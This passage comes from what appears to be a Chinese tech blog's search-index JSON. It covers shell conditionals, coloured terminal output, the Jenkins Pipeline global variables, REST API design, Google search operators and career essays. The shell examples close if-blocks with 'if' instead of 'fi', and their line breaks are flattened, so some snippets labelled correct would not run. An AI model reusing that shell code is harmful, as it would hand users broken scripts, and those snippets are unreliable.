越是漂亮的语言,越会骗人"},{"content":"if then // good if [ -d public ] then echo \u0026#34;public exist\u0026#34; if // good if [ -d public ]; then echo \u0026#34;public exist\u0026#34; if // error: if和then写成一行时,条件后必须加上分号 if [ -d public ] then echo \u0026#34;public exist\u0026#34; if // error: shell对空格比较敏感,多个空格和少个空格,执行的含义完全不同 // 在[]中,内侧前后都需要加上空格 if [-d public] then echo \u0026#34;public exist\u0026#34; if if elif then if [ -d public ] then echo \u0026#34;public exist\u0026#34; elif then 循环 switch 常用例子 判断目录是否存在 if [ -d public ] then echo \u0026#34;public exist\u0026#34; if 判断文件是否存在 ","permalink":"https://wdd.js.org/shell/flow-control/","summary":"if then // good if [ -d public ] then echo \u0026#34;public exist\u0026#34; if // good if [ -d public ]; then echo \u0026#34;public exist\u0026#34; if // error: if和then写成一行时,条件后必须加上分号 if [ -d public ] then echo \u0026#34;public exist\u0026#34; if // error: shell对空格比较敏感,多个空格和少个空格,执行的含义完全不同 // 在[]中,内侧前后都需要加上空格 if [-d public] then echo \u0026#34;public exist\u0026#34; if if elif then if [ -d public ] then echo \u0026#34;public exist\u0026#34; elif then 循环 switch 常用例子 判断目录是否存在 if [ -d public ] then echo \u0026#34;public exist\u0026#34; if 判断文件是否存在 ","title":"流程控制"},{"content":"打印彩色字体 0 重置 30 黑色 31 红色 32 绿色 33 黄色 34 蓝色 35 洋红 36 青色 37 白色 把 31 改成其他数字,就可打印其他颜色的 this 了。大部分情况下,我们只需要记住红色和绿色就可以了\necho -e \u0026#34;\\e[1;31m this \\e[0m whang\u0026#34; 打印彩色背景 0 重置 40 黑色 41 红色 42 绿色 43 黄色 44 蓝色 45 洋红 46 青色 47 白色 echo -e \u0026#34;\\e[1;45m this \\e[0m whang\u0026#34; ","permalink":"https://wdd.js.org/shell/colorful-print/","summary":"打印彩色字体 0 重置 30 黑色 31 红色 32 绿色 33 黄色 34 蓝色 35 洋红 36 青色 37 白色 把 31 改成其他数字,就可打印其他颜色的 this 了。大部分情况下,我们只需要记住红色和绿色就可以了\necho -e \u0026#34;\\e[1;31m this \\e[0m whang\u0026#34; 打印彩色背景 0 重置 40 黑色 41 红色 42 绿色 43 黄色 44 蓝色 45 洋红 46 青色 47 白色 echo -e \u0026#34;\\e[1;45m this \\e[0m whang\u0026#34; ","title":"彩色文本与彩色背景打印"},{"content":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.\nMethods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.)\nSome methods return instances of auxiliary classes which serve as holders for an ID and which have their own methods and properties. Methods taking a body return any value returned by the body itself. Some method parameters are optional and are enclosed with []. Reference:\nwithRegistry(url[, credentialsId]) {…} Specifies a registry URL such as https://docker.mycorp.com/, plus an optional credentials ID to connect to it. withServer(uri[, credentialsId]) {…} Specifies a server URI such as tcp://swarm.mycorp.com:2376, plus an optional credentials ID to connect to it. withTool(toolName) {…} Specifies the name of a Docker installation to use, if any are defined in Jenkins global configuration. If unspecified, docker is assumed to be in the $PATH of the slave agent. image(id) Creates an Image object with a specified name or ID. See below. build(image[, args]) Runs docker build to create and tag the specified image from a Dockerfile in the current directory. Additional args may be added, such as \u0026lsquo;-f Dockerfile.other \u0026ndash;pull \u0026ndash;build-arg http_proxy=http://192.168.1.1:3128 .\u0026rsquo;. Like docker build, args must end with the build context. Returns the resulting Image object. Records a FROM fingerprint in the build. Image.id The image name with optional tag (mycorp/myapp, mycorp/myapp:latest) or ID (hexadecimal hash). Image.run([args, command]) Uses docker run to run the image, and returns a Container which you could stop later. Additional args may be added, such as \u0026lsquo;-p 8080:8080 \u0026ndash;memory-swap=-1\u0026rsquo;. Optional command is equivalent to Docker command specified after the image. Records a run fingerprint in the build. Image.withRun[(args[, command])] {…} Like run but stops the container as soon as its body exits, so you do not need a try-finally block. Image.inside[(args)] {…} Like withRun this starts a container for the duration of the body, but all external commands (sh) launched by the body run inside the container rather than on the host. These commands run in the same working directory (normally a slave workspace), which means that the Docker server must be on localhost. Image.tag([tagname]) Runs docker tag to record a tag of this image (defaulting to the tag it already has). Will rewrite an existing tag if one exists. Image.push([tagname]) Pushes an image to the registry after tagging it as with the tag method. For example, you can use image.push \u0026rsquo;latest\u0026rsquo; to publish it as the latest version in its repository. Image.pull() Runs docker pull. Not necessary before run, withRun, or inside. Image.imageName() The id prefixed as needed with registry information, such as docker.mycorp.com/mycorp/myapp. May be used if running your own Docker commands using sh. Container.id Hexadecimal ID of a running container. Container.stop Runs docker stop and docker rm to shut down a container and remove its storage. Container.port(port) Runs docker port on the container to reveal how the port port is mapped on the host. env Environment variables are accessible from Groovy code as env.VARNAME or simply as VARNAME. You can write to such properties as well (only using the env. prefix):\nenv.MYTOOL_VERSION = \u0026#39;1.33\u0026#39; node { sh \u0026#39;/usr/local/mytool-$MYTOOL_VERSION/bin/start\u0026#39; } These definitions will also be available via the REST API during the build or after its completion, and from upstream Pipeline builds using the build step.\nHowever any variables set this way are global to the Pipeline build. For variables with node-specific content (such as file paths), you should instead use the withEnv step, to bind the variable only within a node block.\nA set of environment variables are made available to all Jenkins projects, including Pipelines. The following is a general list of variables (by name) that are available; see the notes below the list for Pipeline-specific details.\nBRANCH_NAME For a multibranch project, this will be set to the name of the branch being built, for example in case you wish to deploy to production from master but not from feature branches. CHANGE_ID For a multibranch project corresponding to some kind of change request, this will be set to the change ID, such as a pull request number. CHANGE_URL For a multibranch project corresponding to some kind of change request, this will be set to the change URL. CHANGE_TITLE For a multibranch project corresponding to some kind of change request, this will be set to the title of the change. CHANGE_AUTHOR For a multibranch project corresponding to some kind of change request, this will be set to the username of the author of the proposed change. CHANGE_AUTHOR_DISPLAY_NAME For a multibranch project corresponding to some kind of change request, this will be set to the human name of the author. CHANGE_AUTHOR_EMAIL For a multibranch project corresponding to some kind of change request, this will be set to the email address of the author. CHANGE_TARGET For a multibranch project corresponding to some kind of change request, this will be set to the target or base branch to which the change could be merged. BUILD_NUMBER The current build number, such as \u0026ldquo;153\u0026rdquo; BUILD_ID The current build ID, identical to BUILD_NUMBER for builds created in 1.597+, but a YYYY-MM-DD_hh-mm-ss timestamp for older builds **BUILD_DISPLAY_NAME The display name of the current build, which is something like \u0026ldquo;#153\u0026rdquo; by default. JOB_NAME Name of the project of this build, such as \u0026ldquo;foo\u0026rdquo; or \u0026ldquo;foo/bar\u0026rdquo;. (To strip off folder paths from a Bourne shell script, try: ${JOB_NAME##*/}) BUILD_TAG String of \u0026ldquo;jenkins-${JOB_NAME}-${BUILD_NUMBER}\u0026rdquo;. Convenient to put into a resource file, a jar file, etc for easier identification. EXECUTOR_NUMBER The unique number that identifies the current executor (among executors of the same machine) that’s carrying out this build. This is the number you see in the \u0026ldquo;build executor status\u0026rdquo;, except that the number starts from 0, not 1. NODE_NAME Name of the slave if the build is on a slave, or \u0026ldquo;master\u0026rdquo; if run on master NODE_LABELS Whitespace-separated list of labels that the node is assigned. WORKSPACE The absolute path of the directory assigned to the build as a workspace. JENKINS_HOME The absolute path of the directory assigned on the master node for Jenkins to store data. JENKINS_URL Full URL of Jenkins, like http://server:port/jenkins/ (note: only available if Jenkins URL set in system configuration) BUILD_URL Full URL of this build, like http://server:port/jenkins/job/foo/15/ (Jenkins URL must be set) JOB_URL Full URL of this job, like http://server:port/jenkins/job/foo/ (Jenkins URL must be set) The following variables are currently unavailable inside a Pipeline script: SCM-specific variables such as SVN_REVISIONAs an example of loading variable values from Groovy:\nmail to: \u0026#39;devops@acme.com\u0026#39;, subject: \u0026#34;Job \u0026#39;${JOB_NAME}\u0026#39; (${BUILD_NUMBER}) is waiting for input\u0026#34;, body: \u0026#34;Please go to ${BUILD_URL} and verify the build\u0026#34; params Exposes all parameters defined in the build as a read-only map with variously typed values. Example:\nif (params.BOOLEAN_PARAM_NAME) {doSomething()} Note for multibranch (Jenkinsfile) usage: the properties step allows you to define job properties, but these take effect when the step is run, whereas build parameter definitions are generally consulted before the build begins. As a convenience, any parameters currently defined in the job which have default values will also be listed in this map. That allows you to write, for example:\nproperties([parameters([string(name: \u0026lsquo;BRANCH\u0026rsquo;, defaultValue: \u0026lsquo;master\u0026rsquo;)])])\ngit url: \u0026#39;…\u0026#39;, branch: params.BRANCH and be assured that the master branch will be checked out even in the initial build of a branch project, or if the previous build did not specify parameters or used a different parameter name.\ncurrentBuild The currentBuild variable may be used to refer to the currently running build. It has the following readable properties:\nnumber build number (integer) result typically SUCCESS, UNSTABLE, or FAILURE (may be null for an ongoing build) currentResult typically SUCCESS, UNSTABLE, or FAILURE. Will never be null. resultIsBetterOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is better than or equal to the provided result. resultIsWorseOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is worse than or equal to the provided result. displayName normally #123 but sometimes set to, e.g., an SCM commit identifier description additional information about the build id normally number as a string timeInMillis time since the epoch when the build was scheduled startTimeInMillis time since the epoch when the build started running duration duration of the build in milliseconds durationString a human-readable representation of the build duration previousBuild another similar object, or null nextBuild similarly absoluteUrl URL of build index page buildVariables for a non-Pipeline downstream build, offers access to a map of defined build variables; for a Pipeline downstream build, any variables set globally on env changeSets a list of changesets coming from distinct SCM checkouts; each has a kind and is a list of commits; each commit has a commitId, timestamp, msg, author, and affectedFiles each of which has an editType and path; the value will not generally be Serializable so you may only access it inside a method marked @NonCPS rawBuild a hudson.model.Run with further APIs, only for trusted libraries or administrator-approved scripts outside the sandbox; the value will not be Serializable so you may only access it inside a method marked @NonCPS Additionally, for this build only (but not for other builds), the following properties are writable: result displayName description scm Represents the SCM configuration in a multibranch project build. Use checkout scm to check out sources matching Jenkinsfile.You may also use this in a standalone project configured with Pipeline script from SCM, though in that case the checkout will just be of the latest revision in the branch, possibly newer than the revision from which the Pipeline script was loaded.\n参考 Global Variable Reference ","permalink":"https://wdd.js.org/posts/2019/10/ikg19e/","summary":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.\nMethods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.","title":"Jenkins 全局变量参考"},{"content":"1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts. POST /users. PUT /users/123 - upgrade a user entity with id = 123. DELETE /users/123 - delete a user with id = 123. 6. 文档 7. 版本 版本管理一般有两种\n位于url中的版本标识: http://example.com/api/v1 位于请求头中的版本标识:Accept: application/vnd.redkavasyl+json; version=2.0 8. 深入理解状态与无状态 我认为REST架构最难理解的就是状态与无状态。下面我画出两个示意图。\n图1是有状态的服务,状态存储于单个服务之中,一旦一个服务挂了,状态就没了,有状态服务很难扩展。无状态的服务,状态存储于客户端,一个请求可以被投递到任何服务端,即使一个服务挂了,也不回影响到同一个客户端发来的下一个请求。\n【图1 有状态的架构】\n【图2 无状态的架构】\neach request from client to server must contain all of the information necessary to understand the request, and cannot take advantage of any stored context on the server. Session state is therefore kept entirely on the client. rest_arch_style stateless\n每一个请求自身必须携带所有的信息,让客户端理解这个请求。举个栗子,常见的翻页操作,应该客户端告诉服务端想要看第几页的数据,而不应该让服务端记住客户端看到了第几页。\n9. 参考 A Beginner’s Tutorial for Understanding RESTful API Versioning REST Services http://ruanyifeng.com/blog/2018/10/restful-api-best-practices.html https://florimond.dev/en/posts/2018/08/restful-api-design-13-best-practices-to-make-your-users-happy/ https://docs.microsoft.com/en-us/azure/architecture/best-practices/api-design https://github.com/Microsoft/api-guidelines/blob/master/Guidelines.md https://github.com/cocoajin/http-api-design-ZH_CN https://www.cnblogs.com/welan/p/9875103.html ","permalink":"https://wdd.js.org/posts/2019/10/irl0p4/","summary":"1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts.","title":"Restful API 架构思考"},{"content":"1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 + 包含A且必须包含B A +B A和+之间有空格 Maxwell +wills - 包含A且不包含B A -B A和+之间有空格 Maxwell -Absolom \u0026quot; \u0026quot; 完整匹配AB \u0026ldquo;AB\u0026rdquo; \u0026ldquo;Thomas Jefferson\u0026rdquo; OR 包含A或者B A OR B 或者 `A B` +-\u0026ldquo;OR 指令可以组合,完成更复杂的查询 beach -sandy +albert +nathaniel ~ 包含A, 并且包含B的近义词 A ~B github ~js .. 区间查询 AB之间 A..B china 1888..2000 * 匹配任意字符 node* java site: 站内搜索 A site:B filetype: 按照文件类型搜索 A filetype:B csta filetype:pdf 3. 关键词使用 方法 说明 示例 列举关键词 列举所有和搜索相关的关键词,并且尽量把重要的关键词排在前面。不同的关键词顺序会导致不同的返回不同的结果 书法 毛笔 绘画 不要使用某些词 如代词介词语气词,如i, the, of, it, 我,吗 搜索引擎一般会直接忽略这些信息含量少的词 大小写不敏感 大写字符和小写字符在搜索引擎看没有区别,尽量使用小写的就可以 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 Advanced Google Search Commands Google_rules_for_searching.pdf An introduction to search commands ","permalink":"https://wdd.js.org/posts/2019/10/giflpm/","summary":"1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 + 包含A且必须包含B A +B A和+之间有空格 Maxwell +wills - 包含A且不包含B A -B A和+之间有空格 Maxwell -Absolom \u0026quot; \u0026quot; 完整匹配AB \u0026ldquo;AB\u0026rdquo; \u0026ldquo;Thomas Jefferson\u0026rdquo; OR 包含A或者B A OR B 或者 `A B` +-\u0026ldquo;OR 指令可以组合,完成更复杂的查询 beach -sandy +albert +nathaniel ~ 包含A, 并且包含B的近义词 A ~B github ~js .. 区间查询 AB之间 A..B china 1888..2000 * 匹配任意字符 node* java site: 站内搜索 A site:B filetype: 按照文件类型搜索 A filetype:B csta filetype:pdf 3.","title":"掌握谷歌搜索高级指令"},{"content":"1. 培训行业的现状和问题 进入培训班学习可能有一下两个原因:\n想转行 学校里学的东西太过时了,需要深入学习本行业的知识 培训的行业的核心思想都是:如何快速的让你能够面试通过\n老师教的东西大多是一些面试必须要问的一些知识,做的项目也应该都是市面上比较火的项目。这么做的不利之处有以下几点:\n局限性:知识局限于教师的授课范围,知识面窄 扩展性:快餐式学习管饱不管消化,很多知识吸收不高,无法举一反三 系统性:没有系统的整体知识体系 所以这些因素可能会让用人不太喜欢培训出来的应聘者,而往往希望刚毕业的应届生。但是,培训行业出来的应聘者,也不乏国士无双的牛逼人物。\n2. 如何成为培训出来的牛人? 无论在哪个行业,自学都是必不可少的事情。毕业不是学习的终点,而应该是起点。你和技术牛人之间的距离或许并不遥远,可能只是一个芭蕉扇的距离。\n2.1. 读权威书籍,扎实理论基础 每个行业都有一些经历时间考验而熠熠生辉的经典数据,例如在前端行业。我认为下面两本书是必须要读完一本的。\n基础\nJavaScript高级程序设计 JavaScript权威指南 进阶\nJavaScript语言精粹 JavaScript忍者秘籍 You Don\u0026rsquo;t Know JS JS函数式编程指南 2.2. 动手能力,闲话少说,放码过来 各种demo啊,效果啊,有时间自己都可以撸一遍,放在github上,又不收钱,还能提高动手能力。\n2.3. 数据结构 差劲的程序员操心代码,牛逼的程序员操心数据结构和它们之间的关系。 一一Linus Torvalds, Linux 创始人\n优秀的数据结构,可以节省你80%的编码时间。差劲的数据结构,你需要花大量的时间去做各种高难度动作的转换,一不小心,数据库就要累的气喘如牛,停机罢工。\n2.4. 知识积累,从博客开始 如果你已经在某个行业工作个两三年,一篇像样的博客都没有。\n那我觉得你可能是个懒人。因为几乎很少写东西。\n我觉得你可以是个自私的人。因为做计算机行业的,谁没有用过别人造的轮子。即使你没有造轮子的能力,即使你给出一个问题应该如何解决的,至少你对计算机行业也作出了你的贡献。\n2.5. 互联网的基石 TCP IP 计算机行业是分层的,就像大海一样,海面上的往往都是惊涛骇浪,暴风骤雨,各种框架层出不穷,争奇斗艳。当你深入海底,你会发现,那里是最平静的地方。而TCP IP等协议知识,就是整个互联网大航海时代的海底。互联网行业如此多娇,引无数框架竞折腰。浪潮之巅者成为行业热点,所有资源会喷薄涌入,失去优势被替代者,往往折戟沉沙铁未销。总之,越是上层,竞争越激烈,换代越快。\n但是底层的TCP/IP之类的知识,往往几十年都不会有多大的改变。而且无论你从事什么语言开发,只要你涉及到通信了,你就需要TCP/IP的知识点,不过你不清楚这些知识点,你可以随时给自己埋下定时炸弹。\n这个错误我也犯过,你可以看我的犯错记录:哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首。\n关于TCP/IP, 推荐一下书籍\n基础\n图解TCP/IP : 第5版 图解HTTP 进阶\nHTTP权威指南 2.6. 工具的威力 你用刀,我用枪,谁说谁能打过谁。原始社会两个野蛮人相遇,块头大的,食物多,可以拥有更多的繁衍后代的权利。但是当一个野蛮人知道用刀的威力时,他就不会害怕胳膊比较粗的对手了。\n举例来说,前端开发免不了有时需要一个静态文件服务器,如果你只知道阿帕奇,那你的工具也太落后了。你可以看看这篇文章:一行命令搭建简易静态文件http服务器\n当你想要更偷懒,想要不安于现状时,你会找到更多的厉害的工具。\n2.7. 英语阅读能力 IT行业还有一个现象,就是看英文文档如喝中药一般,总是捏着鼻子也看不下去。看中文文档放佛如喝王老吉,消火又滋润。\nIT行业至今来说,放佛还是个舶来品。所有的最新的文档都是英文的。但是也不乏有好的中文翻译文档,但是都是需要花时间去等待。而且英文文档也随着翻译者的水平而参差不齐。\n其实我们完全没必要去害怕英文文档,其实英文文档里最常用的单词往往是很固定的。又不是什么言情小说,总是让你摸不着头脑。\n你不想看英文文档,从本质上说,还是因为你懒。\n2.8. 文档能力 大多说程序的文档都是写给自己看的,或者说大多说的程序员的语文都是数学老师教的。这个其实很让看文档的人苦恼的。一个优秀的程序和框架,无一不是文档非常完善。因为文档的完善才能有利于文档的传播,才有利于解决问题。你的框架再牛逼,效率再如何高,没有人能看的懂,那是没用了。闭门造车永远也搞不出好东西。\n关于如何写作文档,可以参考:如何写好技术文档?\n3. 总结 开放的思维,敢于接纳一些新事物 不断学习,不舍昼夜 记笔记,写博客,要给所有的努力留下记录 ","permalink":"https://wdd.js.org/posts/2019/10/vyu2rs/","summary":"1. 培训行业的现状和问题 进入培训班学习可能有一下两个原因:\n想转行 学校里学的东西太过时了,需要深入学习本行业的知识 培训的行业的核心思想都是:如何快速的让你能够面试通过\n老师教的东西大多是一些面试必须要问的一些知识,做的项目也应该都是市面上比较火的项目。这么做的不利之处有以下几点:\n局限性:知识局限于教师的授课范围,知识面窄 扩展性:快餐式学习管饱不管消化,很多知识吸收不高,无法举一反三 系统性:没有系统的整体知识体系 所以这些因素可能会让用人不太喜欢培训出来的应聘者,而往往希望刚毕业的应届生。但是,培训行业出来的应聘者,也不乏国士无双的牛逼人物。\n2. 如何成为培训出来的牛人? 无论在哪个行业,自学都是必不可少的事情。毕业不是学习的终点,而应该是起点。你和技术牛人之间的距离或许并不遥远,可能只是一个芭蕉扇的距离。\n2.1. 读权威书籍,扎实理论基础 每个行业都有一些经历时间考验而熠熠生辉的经典数据,例如在前端行业。我认为下面两本书是必须要读完一本的。\n基础\nJavaScript高级程序设计 JavaScript权威指南 进阶\nJavaScript语言精粹 JavaScript忍者秘籍 You Don\u0026rsquo;t Know JS JS函数式编程指南 2.2. 动手能力,闲话少说,放码过来 各种demo啊,效果啊,有时间自己都可以撸一遍,放在github上,又不收钱,还能提高动手能力。\n2.3. 数据结构 差劲的程序员操心代码,牛逼的程序员操心数据结构和它们之间的关系。 一一Linus Torvalds, Linux 创始人\n优秀的数据结构,可以节省你80%的编码时间。差劲的数据结构,你需要花大量的时间去做各种高难度动作的转换,一不小心,数据库就要累的气喘如牛,停机罢工。\n2.4. 知识积累,从博客开始 如果你已经在某个行业工作个两三年,一篇像样的博客都没有。\n那我觉得你可能是个懒人。因为几乎很少写东西。\n我觉得你可以是个自私的人。因为做计算机行业的,谁没有用过别人造的轮子。即使你没有造轮子的能力,即使你给出一个问题应该如何解决的,至少你对计算机行业也作出了你的贡献。\n2.5. 互联网的基石 TCP IP 计算机行业是分层的,就像大海一样,海面上的往往都是惊涛骇浪,暴风骤雨,各种框架层出不穷,争奇斗艳。当你深入海底,你会发现,那里是最平静的地方。而TCP IP等协议知识,就是整个互联网大航海时代的海底。互联网行业如此多娇,引无数框架竞折腰。浪潮之巅者成为行业热点,所有资源会喷薄涌入,失去优势被替代者,往往折戟沉沙铁未销。总之,越是上层,竞争越激烈,换代越快。\n但是底层的TCP/IP之类的知识,往往几十年都不会有多大的改变。而且无论你从事什么语言开发,只要你涉及到通信了,你就需要TCP/IP的知识点,不过你不清楚这些知识点,你可以随时给自己埋下定时炸弹。\n这个错误我也犯过,你可以看我的犯错记录:哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首。\n关于TCP/IP, 推荐一下书籍\n基础\n图解TCP/IP : 第5版 图解HTTP 进阶\nHTTP权威指南 2.6. 工具的威力 你用刀,我用枪,谁说谁能打过谁。原始社会两个野蛮人相遇,块头大的,食物多,可以拥有更多的繁衍后代的权利。但是当一个野蛮人知道用刀的威力时,他就不会害怕胳膊比较粗的对手了。\n举例来说,前端开发免不了有时需要一个静态文件服务器,如果你只知道阿帕奇,那你的工具也太落后了。你可以看看这篇文章:一行命令搭建简易静态文件http服务器\n当你想要更偷懒,想要不安于现状时,你会找到更多的厉害的工具。\n2.7. 英语阅读能力 IT行业还有一个现象,就是看英文文档如喝中药一般,总是捏着鼻子也看不下去。看中文文档放佛如喝王老吉,消火又滋润。","title":"如何成为从培训班里出来的牛人?"},{"content":"从分工到专业化 分工提高生产效率,专业化提高个人价值。很多人都认为,一旦我们进入了某一行,我们就应该在这个行业深挖到底。例如我是做前端的,我就会去学习各种前端的知识点,各种层出不穷的框架。我总是在如饥似渴的希望自己能够保持在深入学习的状态,我不想哪一天自己突然out了。\n专业化的危机在哪? 以前我在上初中的时候,就稍稍的学习了一点点ActionScript的知识。可能有些人不知道ActionScript是干嘛的,它是在flash的环境中工作的,可以在flash里做一些动画和特效之类的。那时候flash是很火的技术,几乎所有的网站都是有flash的,所以会ActionScript语言的程序员,工资都不低。\n但是,你现在还听过什么ActionScript吗? 它的宿主环境flash都已经被淘汰了,皮之不存毛将焉附。可想而知,flash的淘汰,同时也让时长淘汰了一批在ActionScript的专家。\n所以,专业化并不是一个安全的道路。准确来说,世界上本来就没有安全的路。大多说认为这条路安全,是因为他们总是以静态的眼光看这条路。说点题外话,如果你书读多了,你会发现,其实一直在你思想里的那些观念,那些故事,往往都是忽悠人的。你可以看看我的一个书单:2018年我的阅读计划。\n从企业的角度考虑,每个老板都想招在某一方面专家。但是从个人的角度考虑,如果你在专业化的道路钻研的非常深,或许有时候你应该放慢脚步,找个长椅,坐着想一想,如果你前面马上就是死路了,你应该怎么办?\n我们应该怎么办? 世界上没有安全的路,世界上也没有一直安全的职业。一个职业的火爆,往往因为这个行业的火爆。而永远也没有永远火爆的行业,当退潮时,将会有大批的弄潮儿会搁浅,干死,窒息\u0026hellip;\u0026hellip;\n除去环境造成的扰动,人的身体也会随着年龄会慢慢老化。\n你可以想象一下,当你四十多岁时。那些新来的实习生,比你要的工资低,比你更容易接受这个行业的前沿知识,比你更加能加班,比你能力更强时,比你更听话时。你的优势在哪里?我相信到那时候,你的领导会毫不犹豫开了你。\n在此,你要改变。我给出以下几个角度,你可以自行延伸。\n开始锻炼身体 这是一切的基石 搞一搞副业,学习一下你喜欢的东西,你可以去深入学学如何做菜,如何摄影等等 学习理财知识,这是学校从没教你的,但是却是非常重要的东西 读书,越多越好 参考文献 专业主义 日 大前研一 富爸爸穷爸爸 罗伯特·清崎 / 莎伦·莱希特 国富论 英 亚当·斯密 失控 乌合之众 法 古斯塔夫·勒庞 未来世界的幸存者 阮一峰 新生 七年就是一辈子 李笑来 ","permalink":"https://wdd.js.org/posts/2019/10/vpqfyr/","summary":"从分工到专业化 分工提高生产效率,专业化提高个人价值。很多人都认为,一旦我们进入了某一行,我们就应该在这个行业深挖到底。例如我是做前端的,我就会去学习各种前端的知识点,各种层出不穷的框架。我总是在如饥似渴的希望自己能够保持在深入学习的状态,我不想哪一天自己突然out了。\n专业化的危机在哪? 以前我在上初中的时候,就稍稍的学习了一点点ActionScript的知识。可能有些人不知道ActionScript是干嘛的,它是在flash的环境中工作的,可以在flash里做一些动画和特效之类的。那时候flash是很火的技术,几乎所有的网站都是有flash的,所以会ActionScript语言的程序员,工资都不低。\n但是,你现在还听过什么ActionScript吗? 它的宿主环境flash都已经被淘汰了,皮之不存毛将焉附。可想而知,flash的淘汰,同时也让时长淘汰了一批在ActionScript的专家。\n所以,专业化并不是一个安全的道路。准确来说,世界上本来就没有安全的路。大多说认为这条路安全,是因为他们总是以静态的眼光看这条路。说点题外话,如果你书读多了,你会发现,其实一直在你思想里的那些观念,那些故事,往往都是忽悠人的。你可以看看我的一个书单:2018年我的阅读计划。\n从企业的角度考虑,每个老板都想招在某一方面专家。但是从个人的角度考虑,如果你在专业化的道路钻研的非常深,或许有时候你应该放慢脚步,找个长椅,坐着想一想,如果你前面马上就是死路了,你应该怎么办?\n我们应该怎么办? 世界上没有安全的路,世界上也没有一直安全的职业。一个职业的火爆,往往因为这个行业的火爆。而永远也没有永远火爆的行业,当退潮时,将会有大批的弄潮儿会搁浅,干死,窒息\u0026hellip;\u0026hellip;\n除去环境造成的扰动,人的身体也会随着年龄会慢慢老化。\n你可以想象一下,当你四十多岁时。那些新来的实习生,比你要的工资低,比你更容易接受这个行业的前沿知识,比你更加能加班,比你能力更强时,比你更听话时。你的优势在哪里?我相信到那时候,你的领导会毫不犹豫开了你。\n在此,你要改变。我给出以下几个角度,你可以自行延伸。\n开始锻炼身体 这是一切的基石 搞一搞副业,学习一下你喜欢的东西,你可以去深入学学如何做菜,如何摄影等等 学习理财知识,这是学校从没教你的,但是却是非常重要的东西 读书,越多越好 参考文献 专业主义 日 大前研一 富爸爸穷爸爸 罗伯特·清崎 / 莎伦·莱希特 国富论 英 亚当·斯密 失控 乌合之众 法 古斯塔夫·勒庞 未来世界的幸存者 阮一峰 新生 七年就是一辈子 李笑来 ","title":"你不知道的专业化道路"},{"content":"1. 问题1:chosen插件无法显示图标 问题现象在我本地调试的时候,我使用了一个多选下拉框的插件,就是chosen, 